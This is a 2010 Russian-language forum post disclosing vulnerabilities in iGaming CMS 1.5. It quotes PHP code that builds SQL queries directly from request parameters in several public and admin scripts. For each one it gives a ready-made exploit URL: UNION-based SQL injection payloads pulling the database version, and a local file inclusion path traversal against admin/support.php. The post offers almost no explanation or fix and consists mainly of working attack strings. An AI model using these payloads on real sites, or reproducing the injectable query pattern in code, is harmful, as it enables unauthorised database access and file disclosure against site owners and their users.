26.02.2010, 15:19
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
iGaming
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com SQL injection
mq=off
games.php
PHP код:
$sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` ";
if (!empty($_REQUEST['title'])) {
$sql .= "WHERE `title` LIKE '$_REQUEST[title]%' ";
if (!empty($_REQUEST['section'])) {
$sql .= " AND `section` = '$_REQUEST[section]' ";
}
$sql .= " AND `published` = '1' ";
} else {
if (!empty($_REQUEST['section'])) {
$sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' ";
} else {
$sql .= "WHERE `published` = '1' ";
...
if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC")
Код:
http://localhost/games.php?order=genre§ion=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort=
index.php
Код:
http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+
previews.php
PHP код:
$preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'");
Код:
http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+
Admin Panel (SQL inj) (LFI)
LFI : support.php
PHP код:
require_once("../sources/docs/$_REQUEST[id].php");
Код:
http://localhost/admin/support.php?id=../../file%00
SQL injection : screenshots.php
mq=off
PHP код:
if (isset($_REQUEST['s'])) {
$latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC");
Код:
http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+
Последний раз редактировалось [x60]unu; 26.02.2010 в 18:11..
|
|
|